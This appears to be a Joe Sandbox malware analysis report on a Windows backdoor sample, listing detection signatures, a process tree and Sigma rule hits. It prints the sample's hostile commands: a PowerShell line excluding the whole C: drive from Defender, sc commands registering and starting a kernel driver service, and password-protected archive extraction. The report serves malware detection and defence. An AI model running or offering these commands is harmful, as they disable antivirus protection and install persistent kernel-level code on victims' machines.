Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cVyexkZjrG.exe

Overview

General Information

Sample name:cVyexkZjrG.exe
renamed because original name is a hash value
Original sample name:5A3C5AA184E4FDB2DE4530C18ADB9B12FFC1A101C86CDE8DE13CE49D7A7A2B44.exe
Analysis ID:1580243
MD5:4e1927f742599f95f0d9450b4b8c2c80
SHA1:4bd20ceb48adb224d11eae63ce6f27cb974e321b
SHA256:5a3c5aa184e4fdb2de4530c18adb9b12ffc1a101c86cde8de13ce49d7a7a2b44
Tags:backdoorexesilverfoxuser-zhuzhu0009
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cVyexkZjrG.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\cVyexkZjrG.exe" MD5: 4E1927F742599F95F0D9450B4B8C2C80)
    • cVyexkZjrG.tmp (PID: 6572 cmdline: "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" MD5: 0195248B8EBF37D072592944E7488FC4)
      • powershell.exe (PID: 1400 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6300 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cVyexkZjrG.exe (PID: 2464 cmdline: "C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT MD5: 4E1927F742599F95F0D9450B4B8C2C80)
        • cVyexkZjrG.tmp (PID: 6472 cmdline: "C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp" /SL5="$40436,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT MD5: 0195248B8EBF37D072592944E7488FC4)
          • 7zr.exe (PID: 4616 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7060 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4592 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3452 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6332 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3636 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5560 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6660 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6000 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2884 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5960 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6660 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3116 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6540 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6768 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6604 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6660 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3964 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5804 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3636 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3772 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2148 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5344 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5668 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5228 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2656 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6604 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3348 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp, ParentProcessId: 6572, ParentProcessName: cVyexkZjrG.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 1400, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4592, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3452, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp, ParentProcessId: 6572, ParentProcessName: cVyexkZjrG.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 1400, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4592, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3452, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp, ParentProcessId: 6572, ParentProcessName: cVyexkZjrG.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 1400, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vacReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vacReversingLabs: Detection: 15%
Multi AV Scanner detection for submitted file
Source: cVyexkZjrG.exeVirustotal: Detection: 8%Perma Link
Source: cVyexkZjrG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: cVyexkZjrG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2172723507.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2172865132.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC4AEC0 FindFirstFileA,FindClose,FindClose,7_2_6CC4AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B36868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00B36868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B37496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00B37496
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0A
